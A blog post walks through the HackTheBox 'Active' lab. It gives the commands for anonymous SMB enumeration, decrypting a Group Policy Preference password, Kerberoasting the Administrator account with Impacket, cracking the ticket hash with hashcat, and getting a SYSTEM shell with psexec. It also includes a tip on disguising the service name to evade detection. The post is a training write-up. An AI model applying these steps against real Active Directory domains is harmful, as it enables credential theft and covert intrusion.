Active — A Kerberos and Active Directory HackTheBox Walkthrough

Mitch Moser
Dec 10, 2018 · 3 min read

Summary

Active is a windows Active Directory server which contained a Groups.xml file in an SMB share accessible through Anonymous logon. This file contained a Group Policy Preference password for a user account which was then cracked in order to gain access to a service account with read access to the user flag.

Privileges were escalated by fetching Service Principal Names associated with the service accounts and retrieve the Administrator’s Kerberos 5 hash. This was able to be cracked and granted read/write access to the filesystem as well as an interactive shell via arbitrary service installation/execution via tools such as psexec.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.100
nmap -sV -sC

This returned a large number of ports. Due to DNS, Kerberos, and LDAP being among the myriad of services and ports on this machine, it appeared to be a Domain Controller. There weren’t many services that allowed direct user interaction and due to the lack of information gathered for SMB on port 445, that was the next target for enumeration on the host.

smbclient -L //10.10.10.100 -N

-L — list shares

-N — anonymous logon

SMB shares

Again, this simple enumeration step returned several findings. A quick way to view access to multiple SMB shares is through a tool called smbmap:

smbmap -H 10.10.10.100
smbmap

After some review, the Replication share returned a Groups.xml file at the path:

\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Reviewing the contents of this file:

Groups.xml

Initial Foothold

There is a username active.htb\SVC_TGS with a cpassword value that contains an AES encrypted password. There are several tools that have been created to crack these passwords including a function that I extracted from PowerSploit in order to crack this file:

Get-DecryptedCpassword

This function receives a Group Policy Preference password as a command-line argument and returns the plaintext string. This even works in PowerShell Core on macOS!

Get-DecryptedCpassword on PowerShell Core

Luckily there is also a built-in tool that ships with Kali to also decrypt this password called gpp-decrypt:

Either method returns the same password and from this account which is able to access the Users share and view the user.txt flag.

Privilege Escalation

The active.htb\SVC_TGS account is able to find and fetch Service Principal Names that are associated with normal user accounts using the GetUserSPNs.py module of Impacket. The following command lists the Administrator account

./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

-dc-ip — IP Address of the domain controller

-request — Requests TGS for users and output them in JtR/hashcat format

GetUserSPNs.py

This returned a Kerberos 5 hash which can be cracked by hashcat using the rockyou.txtwordlist along with the arguments:

hashcat -m 13100 -d 3 -a 0 -o Active.txt Administrator.hash rockyou.dict

The cracked password is written into Active.txt. Reading the file returns the plaintext password Ticketmaster1968. These credentials can be used to access the root.txt flag.

An interactive shell can be gained using tools such as psexec. Many tools which operate similarly to psexec such as the module in Impacket allow the service which is installed and removed to be named. Choosing a service name for something that may be expected to get deleted shortly after installation such as an update to an Antivirus Client is a simple step that may assist in avoiding detection.

./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe
Interactive shell as SYSTEM

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Mitch Moser

Written by

digital brain | analog heart

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade